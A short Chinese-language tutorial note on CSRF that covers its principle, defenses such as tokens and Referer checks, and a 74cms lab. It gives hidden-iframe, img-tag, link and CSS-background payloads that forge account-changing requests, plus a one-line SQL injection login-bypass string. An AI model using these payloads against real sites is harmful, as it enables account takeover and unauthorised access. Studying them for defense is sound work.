跨站請求偽造
通過偽造信任
CSRF漏洞原理
利用目標用戶的合法身份,以目標用戶的名義執行某些非法操作
常見驗證的策略
Referer
:驗證ip等
Token
:生成隨機值加入到cookie里
驗證碼
萬能密碼(密碼繞過)
11%df’ or 1=1%23
理論上沒加防過濾的都可繞過登錄
csrf實驗
材料:74cms
攻擊方寫一個payload偽造url
服務方點擊后發現管理員多了
CSRF漏洞利用方法
1.鏈接利用
<a href="http://127.0.0.1/csrf/csrf.php?username=admin&password=admin">csrf</a>
2.iframe利用
iframe標簽內容將在頁面加載程序中自動進行加載,src指向的位置就是頁面請求的位置
<iframe src="http://127.0.0.1/csrf/csrf.php?username=admin&password=admin" style="display:none"/>
注意:可以設定iframe的 style=“display:none”,以此來不顯示iframe加載的內容
3.img標簽利用
<img src="http://127.0.0.1/csrf/csrf.php?username=admin&password=admin123" />
4.CSS-backgroud利用
可以利用CSS中 backgroud樣式中的url來加載遠程機器上的內容,從而對url中的內容發送http請求
列如:
body{
backgroud:#00f00 url("http://127.0.0.1/csrf/csrf.php?username=admin&password=admin") no-repeat fixed top;
}
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/320986.html
標籤:其他